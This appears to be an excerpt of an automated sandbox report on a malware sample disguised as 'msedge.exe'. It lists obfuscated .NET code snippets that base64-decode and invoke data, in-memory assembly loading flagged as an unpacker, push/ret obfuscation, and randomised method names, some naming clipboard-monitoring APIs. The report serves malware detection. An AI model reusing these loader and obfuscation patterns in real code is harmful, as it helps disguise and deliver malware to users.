Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: msedge.exe, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: msedge.exe.0.dr, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B88239D push E95E52EFh; rep ret		0_2_00007FFD9B8823C9
Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B880ED5 push ebx; iretd		0_2_00007FFD9B880EEA

Source: msedge.exe, saLegFlLWIYnHSeWv3dKuvYxlBAXmTHWTTd8nhPEV0s8kgvX0KnK54sY3BzWxnqLHENZgXaI21laB.cs	High entropy of concatenated method names: 'sQSXmDnUDsAfju97T4GHND0Z0uVKgt2Mxqo7t5XH9S4wvY0PHwEzytrAFlLor6bpxNRGPJfjvHQ4K', 'Cpv5Bao84GFnCoXnGp3IjwCjhO1ve6BavihEqBd8Mg8gymfiuXSzAenMo2qtBL1I3tdV5WkLerfjP', '_25kPvP9OArsrcjPYqJfiilFphPvUjCmj4yixA6i6x3WwuPJUJCK0Ftu2TZf6RJf9KJbgTKpXoBgPh', 'LrEmMqWlTNaekZzNbYg', 'drEk8ukSJBhglopOpqN', 'F6jgVhJQSYaP8XzgGdS', 'GqXHztI9xiRouhGm5e1', 'unaqJKXMjH76iEVJpTp', 't9CYMR5x907eh9lbi4A', 'pitcvW4eeXhS3YNNwWP'
Source: msedge.exe, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	High entropy of concatenated method names: '_9Bn08TCildwgGWw5ui1D1JlHKr9os8w8oiyRTCS75QEGPFy5vOOSEapjlIVJhGz5BKVc4flDBcVvd', 'lFz4ndxuaDtlpPLzecNUzgTpYa8CepDQ5low2qHA07cRu7f3X6Fn9eGrGm2svNSsH1l5nMWdIN5jb', 'cs5yxcWFG5GMivztSJVWFqFiK8zKDWtDZmYqW8o9tq4Bh5p6JTonUXIyyCwwvu3x0Bngn5AZcOVUs', 'utYPojQAhpBfQP2B0Pqcs5fkaIWNwrJw4RTiWES1ECtGG6Y4d7C4XdMeJLRDhKJwB6gqBrPwSS08Z'
Source: msedge.exe, BQfk76GjfWbOZPmrXrjexbuBgHZzzc2HWRV3JskSba2ioac4wluteJ1owZLN.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tdUcGlOTclDzeVklQUy3QDoZHpgGp3D3cs4WriXkcSEkcgPxiJacMi0Ue0VsXnVzptfRGrwoYA7u5', 'P6BLTPLVpgDpgFiA02p2JkCngv2opgGniph3F2FUG890m8c3tDJsFubAwEB5fCaQWJfDH6p7zlJs2', 'btSJAEQsxcVaLmnVewMgeR6QEjjEOP6yp3vdHTEBaGY3JSoSVANQzN4ebIwfJb4PaMPOrVUSePRrv', 'FN0dHj8mqc6R9DJ2sw4FcVFCsxwX3gPZchRUH5UeCNgsZyoj9oj6UabBGse04kZSroRniqKt16Ggc'
Source: msedge.exe, oki3W4coJSffso6AlSga3ltf5jf2RN6Nzg1npsOU6foKFkshYFENyg8TD1j4VyOJ5kUDBJDhf8T0TJCsZ5mHXmZahCyH.cs	High entropy of concatenated method names: '_4wqgx3rxACvqSTA5TnNFCZ02PTFNEADrSyZcLOFWU9V8p3sFKJ3CnIIFj7g2LZgxdLOyDzlEBH9AH7VGso5fTEgL080f', '_97AW74EnnjelP4PdcT4TH70NjYHSseZLGVKMRACKaUZlzXO0pidIkmboMKZFLIBoFPcsecGLtdf0ugAmWqZC1IFRnYND', '_3xGRxu1RSC26lPmgZf1xU2YD1Sf9hwNOGzBaz91Sd8x4w9KiFC9FDvGhu2LkQ51kvV6zBn0NBC2djcsVL3NhrlH5w0BM', 'eSafZIdZsDiuozAint9nzjfaD0MGjWVC2Pz4aud9EB5vW3cBcjW3KlNAUEtQngFmtujwiZsz0u1KGI6qnzvYaUM7wsJo', 'C3mWZB8wUT1oZ1tSOgF', 'Zx05wMg0LzrEBmHdApu', 'f9UVSBRdtQ3TmmzDXfe', 'q6JxcIobJVuC95ojoKh', 'lhK6vIs1xi2rDf9gkun', 'SlG6dwosjdQHqgo643M'
Source: msedge.exe, x2DOmrf4aoRqGMh2z3QbaZVR6tr9eyzf2AOJ9ZTeCg7qSJkrAjXwddUDGjqXKhMmynIIMO5FArAKUC1xnYWktOfzNH34.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'e4kesvFTjsLd31DsTZZQHM6eMxdwqF3uNdLmQdc59AghcOvWdkE1VAb9zf2gDilmy1inF1fYCLT6wHCD7XICfGuX8CJ0', 'jJcD6g3ZYSJ8NyoOrmU', 'x2L7hDhLm3oJx9Gv3lF', '_4iucraCc2ilKQQVLJW3', 'B2bp9XS4UvQUERhXUxb'
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	High entropy of concatenated method names: '_5BbpTl51Wq9dfGhYnTwOMDKobcARSIOgg7TuRLuXhVGnah64gbIEajDyGpIp', 'Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8', 'wAoM6WKp00mJueAI71AFGQ3wqmXEP1pkHB5b09APkIwa0SoeDuJ34CkTOFGQ', 'USt8b06QOt1ruuHADFiuw3w5WoBdzTUUpcO5AbeUoy9MfEr1FkzDRcm5C7Sq', 'A7jDnTxxZGVxJSM6ZVzIuNwT7kNj0ihGLvgPMHPRAt1NeuKD7gm7wDZPbOQg', 'PNT5WaMjY4feO0OxM7kSzb6uxsitzUNHIcPckUl31saejLw0RTeXSKYMUC08', 'NCaYkTTTQJ6httXPbitHIbeXIHkQi9IAA6ATnqWLbN7wdqrep65Sg8hOIvob', 'GzU0vI7e1qQqYVjgl474Qofwqv7jIJEjKfI9FNyHG8VlRYXagvbfYQEtlXdJ', 'xEeWYklEAxw0mi2thoDb2X3e3HLJ4VW5Ix9xJrpokTDMspWyLsKesm8NfegRvEGsnYY8PdfIZZWaYRoRMGlLyj686szu', 'Yz4zxI0GKfm2q0fiDsI92HeeRzFyyDOVHAGxKwYceqxs9nOYwpmJZMen9OZhNKaBiYyhzfSP0nCPQmSiRdEEmP6pFAPY'
Source: msedge.exe, suAjnEJ1tn19sYA8ph0zWO4KI0IAS710e8IdvKQBnFouqwg41s12GOWadMmSoJWXgtPaLiwpYIUTm4RFU37TxMqWnbEW.cs	High entropy of concatenated method names: 'Es9h9uO628y5YKaAkQ7dnwRD30b3fxdzWedVfJCQYelDgDPkdvAjkPOyOqLTB3zYAs22uIUPOGSpXdzy1LJbOPn3pIyw', 'EEJmlnQQEokLnsYFc42', 'MZ1feRe9efQapqQVeeO', 'TZHGqLs9qB9WDqbGRmo', 'TghhsLbD2I8taVjfnXo'
Source: msedge.exe, j4OBjGzsTyn926v13gfaBqAy3UG1OcemEb48CW43hFDL9Rhvuocla1V6yigq1u3yB2KPI83Dfnqe3F3Bjdz6jgdC3Cla.cs	High entropy of concatenated method names: 'Bc6jlvdLiV0eGEtQqUdB7tFmFG7MFYO0nqun0EbTqW3s9xIoMdyz1EELwRR2i0UeEktbcthSIcysLppLTCzTjD9NAusn', '_2LW9I7pYZ3b9EeFJhk327yLmRk5EeoCLfVONfhQkhnxfAC70YWEE8W2WDrB8nHUY2sEvjYgcBjz9DzkFINciGeRvHG3C', 'NwePAVtdHy11RKBkDvm', 'xbGWj78kFh9iVsGKXf1', 'njqZOXLiYN76Wwj0xvE', '_0PguuGyBRNJpE5Pw5SZ'
Source: msedge.exe, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	High entropy of concatenated method names: '_1VTjDOLdCSMBa2movci95KiSGFSWpLfgnCxb822LlYdca0tRdXmSDMOfnnZ2aiOXLpLBqXHuPEaEjaiHANSrHYJg27am', 'Bm1rIHUShRqE8opCQLf', 'YSV46VLzzcCRjLwgvDZ', 'xyDSkenR4LTnO8VU9gZ', 'vdp4TAUeD1fktVjqvb2'
Source: msedge.exe, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	High entropy of concatenated method names: '_13q2RwWL6kIdDpZIw5GHl1rQ3LGDf5pk2w4gX5i7a8YN1hzibxZrCrKncOQ4YJorJehilf00i1Uk3', '_1SlNo9r4dH6Xh2hpGrXad1Z7hVyq189HFbq17zwr6n4UrLJzOlIdS8MD9zd3jbVdCBMipX079gPrS', 'DfX3d8XCHeJXBfgwY9DYLb9MJV3sFfrk2Kb7YDsPYNHs3DpkyJMJRtdcmLCOSYQ0yOC9QfvtU5VIx', 'K8K9Uptmcx8N9bKMIudouOFVobs2MiRk3CpDRl0y8bJDvI7zPo2yyE7HblZiQPusApo3lm36KXLMm', '_2fnOX2a9wuPs69oCra5CqyxdF7pQa8WpnNWLpzxiXc1WrlMYdALUsCtgOKa9PsYWsW5Sq2yiDZkGw', 'YMrKRrkfsOT3HBzZWk07KMj14bj6JgDIsk9ymPQ59VViEQAYWsbVJX1tNvbuhKD1oDNealXlAhy1R', 'pYabpkxx09uAXCbSpMvQeovZUw2WDpPNQ92fWuR56kjJvxOAXfznd7S2ismB1s08n4AEy80tr8pYD', 'JAQQxburJhsr6ChC3StZT1JaDnllduJSJBYE073tMrS5IkQG0nGbqDAngBGiOM68J1m5eESWsAU3I', 'I1obCKB8xP1KjlKpQGdiUeGrHS3vEjY8kvwm2oM6Z3b0xNcGoWRvNesiOn2OAqM31glYTMfPXGKOl', 'QXb3jbSbeRJuBdhDWEt7BiFtO5p735MH7Ke30INhXB0F6JiDgFDLe2vKSYrJfJDy0ecVWkcDpXoyN'
Source: msedge.exe, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	High entropy of concatenated method names: 'uzfZnNOIdl9ASznhBti6dboQGUqma4csnyt40Om4rHnaR8gBon8wo1R97NHd', 'SsGBh0oAZnPm54HCCLaOkCG4Lrbv74Wo5brscPTBJiQGm96MvIeF8WqunDFa', '_3XyJJJLx3AzBJXgjVLQCy8xcM42rXrJQNq4yyM3rNuh1SeizqwQ8gz9KTrz4', '_9PbgE1vnF2SIsxtso3JzCVhNXapaJAmRvSUj7jErjg4OrGnRQokKpvRveyfr', '_9zo2bjiCfoX22dVwaPQEfQGB5LtI5A1FiJZc8GIuGpX8mDJVmxNIuIcchikq', 'AC6POjmTSJSTzUzSaTPKLP0fQ9X8duqqecIyrV9ooXrHb7GmFR5leKnobNVL', 'ApnmwzOllDhlx7gWCX17rmuKPH77lZvf25oO44AWM0h30Yu7WdJiWbOxnhr4', 'CgzgAOIPBlBeXNNtnCxcBVeHJ0NnaC2t3PCwN9OpjWMxIkW15yrgd1L0K7T5', 'DVKx1JP01mCQmbiVDFdgndGq0yXkDTC9uuhxUsDFPs7n9xfeZvWJdFUPAX3t', 'NexAheQlgE8KiUjgQpt8YGIkhuK151Na2bjE654nWvetAbi5y2m29X5qiE1v'
Source: msedge.exe, MsQTzqY2sBj0FbHgvJMxkq82mfk4SRkbM1aSfDlqrPA7a6lhdbMb3mFFZ2ztQ35vqL8QsrgUEv8telYizny7ghy9Nfmg.cs	High entropy of concatenated method names: 'BgWXOWgO0RI3t5W3oSY6ihW9vTBdo1stsBmrzvCZr1Gndmi7B753o71isrC995eT9o2QMOyI9PvSG9rHwAEDKsf8dIVh', 'mLrb28lDc45nuolIayy8ybvyvpu6hLudR8Lzj0L023E83hssFfe4Ma1eNEU7UdPjaWpijvP0kHSy9S65thBPTbeqCUJA', '_09DjBKmArthWJ7592zh4Ps65ujKWx9kewlgrDUdERDPv0YRVmLCPKE64IDx1Ku9e3U0FVLibmymsZ41ZDt9f8mBg2ESA', '_4bGBp8QE8O6JRdrtfU8RPYdGpdB74XBQFj8msmLm3LOx5AvRdiiH6oll9P0BHWylLDtg0fwrvXSjqzRHLQr3fkLXDnLw', 'pzhX0VehHDbIVhtQcfO78TfuwJfdU9GXKyHaZvT26sZpvkz4iUEqJAXiNx6lq92USmuqzNEmovRwUjcVfCg10D1wveTl', 'IIn8M8Ds6cnVUlcv1QgrKruk529mzUiWsXU1TOMMVBP5KAGcmR2e2l9KagPBglolMzhyOzlIKblMEll2IVe5wt33Klux', 'MlxLc2itlvfivBLwxTRK5ByiT33RF6B6hdUZvLb7BSxkuRVtwO0aQikTl07vLaQhcbsNIFTru6AApvXMdCusrd00BaFm', 'j5PRWDxSf9VSbACJNyT4nGG2qWvLnSfB12QggYX0rn7Py0GF86ndV5LzRkt4XuzgnmqzKCAXR3BQtMg2EJA5949r0c7t', '_7RH5Ghmd423QwIyVvETSrMc1o12jYW9ra0VF3ekwSgG6Ot1CEqYbA2o9yAzoOVIknD3fJZqaHVfBMWR9rsKuaHByakzK', 'X3fS1rnQNtUb0WjigIgKDW1OspnbNSJHE03MjnOHx2BJYgzvZFVrX63C5slydfAw6xktldugc6OlQbca6vw3YX9Db0i3'
Source: msedge.exe, FH0T0lPJxmOipHaUauBOzt38ZrPAkacMeVaEICPqgm67LoA3gyNRBYagqZIL.cs	High entropy of concatenated method names: 'hNeG1c7oW4ipUj5sVSmEsWN55cTDnWsViXhKxYAkTbIS5t2fHkEBnrOdRJkN', 'htgGBQkkZ25Vt7aTvoDA9upspcYaatPrvBn7myCTBjxxdJEIc6cQxQPytM4v', '_28rXdbRVwM8xvJIu2LcOZcIN7mghtOewZ0s8beuoMFcTgPr7rSDe2H7uEMDi', 'JnB4EaOWCVK6CmXmNEkbssXGELYRSKUn68Yb3PXR28GmLF9o3Wbg64ynhFDC', '_96WilbUmS1C4eGEe5JH7B7W3XfAvAiZjNuPdCEjIjqaon9pkGDNrw5vAM37S', 'kaod4hQ3GNleMytR5Y0Ina4LOJU3ZQbpOS2vQPoppNpww3WCpTUewvjJAu5V', 'ddxZ2Rhemy7R2unOOsHOMpK8HzMvGjJ0eEikPrdXcaOZ5oyAxkfoafGFsd6f', 'KfU296howMWcLVz74PfISzC1tx9XuSZbFlPXVrT1iOBkWWCORUqwVwfNKrKccUs0cQoleOKXCIWXC', 'QeDrt88qROMXr706fEE0E1HpRIaJPj7hvIFLjVwYZFvlwOEQHm1vPX3JPJFCqtYiS4OZLIC0RJB5A', 'Ld8Rf0Ydv8y64HCHXnTLgAps4XD4i6O886QLjqWRolpqbSeh4kqkDpYc8tDsxDn4s09A9J2uF1jCZ'
Source: msedge.exe.0.dr, saLegFlLWIYnHSeWv3dKuvYxlBAXmTHWTTd8nhPEV0s8kgvX0KnK54sY3BzWxnqLHENZgXaI21laB.cs	High entropy of concatenated method names: 'sQSXmDnUDsAfju97T4GHND0Z0uVKgt2Mxqo7t5XH9S4wvY0PHwEzytrAFlLor6bpxNRGPJfjvHQ4K', 'Cpv5Bao84GFnCoXnGp3IjwCjhO1ve6BavihEqBd8Mg8gymfiuXSzAenMo2qtBL1I3tdV5WkLerfjP', '_25kPvP9OArsrcjPYqJfiilFphPvUjCmj4yixA6i6x3WwuPJUJCK0Ftu2TZf6RJf9KJbgTKpXoBgPh', 'LrEmMqWlTNaekZzNbYg', 'drEk8ukSJBhglopOpqN', 'F6jgVhJQSYaP8XzgGdS', 'GqXHztI9xiRouhGm5e1', 'unaqJKXMjH76iEVJpTp', 't9CYMR5x907eh9lbi4A', 'pitcvW4eeXhS3YNNwWP'
Source: msedge.exe.0.dr, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	High entropy of concatenated method names: '_9Bn08TCildwgGWw5ui1D1JlHKr9os8w8oiyRTCS75QEGPFy5vOOSEapjlIVJhGz5BKVc4flDBcVvd', 'lFz4ndxuaDtlpPLzecNUzgTpYa8CepDQ5low2qHA07cRu7f3X6Fn9eGrGm2svNSsH1l5nMWdIN5jb', 'cs5yxcWFG5GMivztSJVWFqFiK8zKDWtDZmYqW8o9tq4Bh5p6JTonUXIyyCwwvu3x0Bngn5AZcOVUs', 'utYPojQAhpBfQP2B0Pqcs5fkaIWNwrJw4RTiWES1ECtGG6Y4d7C4XdMeJLRDhKJwB6gqBrPwSS08Z'
Source: msedge.exe.0.dr, BQfk76GjfWbOZPmrXrjexbuBgHZzzc2HWRV3JskSba2ioac4wluteJ1owZLN.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tdUcGlOTclDzeVklQUy3QDoZHpgGp3D3cs4WriXkcSEkcgPxiJacMi0Ue0VsXnVzptfRGrwoYA7u5', 'P6BLTPLVpgDpgFiA02p2JkCngv2opgGniph3F2FUG890m8c3tDJsFubAwEB5fCaQWJfDH6p7zlJs2', 'btSJAEQsxcVaLmnVewMgeR6QEjjEOP6yp3vdHTEBaGY3JSoSVANQzN4ebIwfJb4PaMPOrVUSePRrv', 'FN0dHj8mqc6R9DJ2sw4FcVFCsxwX3gPZchRUH5UeCNgsZyoj9oj6UabBGse04kZSroRniqKt16Ggc'
Source: msedge.exe.0.dr, oki3W4coJSffso6AlSga3ltf5jf2RN6Nzg1npsOU6foKFkshYFENyg8TD1j4VyOJ5kUDBJDhf8T0TJCsZ5mHXmZahCyH.cs	High entropy of concatenated method names: '_4wqgx3rxACvqSTA5TnNFCZ02PTFNEADrSyZcLOFWU9V8p3sFKJ3CnIIFj7g2LZgxdLOyDzlEBH9AH7VGso5fTEgL080f', '_97AW74EnnjelP4PdcT4TH70NjYHSseZLGVKMRACKaUZlzXO0pidIkmboMKZFLIBoFPcsecGLtdf0ugAmWqZC1IFRnYND', '_3xGRxu1RSC26lPmgZf1xU2YD1Sf9hwNOGzBaz91Sd8x4w9KiFC9FDvGhu2LkQ51kvV6zBn0NBC2djcsVL3NhrlH5w0BM', 'eSafZIdZsDiuozAint9nzjfaD0MGjWVC2Pz4aud9EB5vW3cBcjW3KlNAUEtQngFmtujwiZsz0u1KGI6qnzvYaUM7wsJo', 'C3mWZB8wUT1oZ1tSOgF', 'Zx05wMg0LzrEBmHdApu', 'f9UVSBRdtQ3TmmzDXfe', 'q6JxcIobJVuC95ojoKh', 'lhK6vIs1xi2rDf9gkun', 'SlG6dwosjdQHqgo643M'
Source: msedge.exe.0.dr, x2DOmrf4aoRqGMh2z3QbaZVR6tr9eyzf2AOJ9ZTeCg7qSJkrAjXwddUDGjqXKhMmynIIMO5FArAKUC1xnYWktOfzNH34.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'e4kesvFTjsLd31DsTZZQHM6eMxdwqF3uNdLmQdc59AghcOvWdkE1VAb9zf2gDilmy1inF1fYCLT6wHCD7XICfGuX8CJ0', 'jJcD6g3ZYSJ8NyoOrmU', 'x2L7hDhLm3oJx9Gv3lF', '_4iucraCc2ilKQQVLJW3', 'B2bp9XS4UvQUERhXUxb'
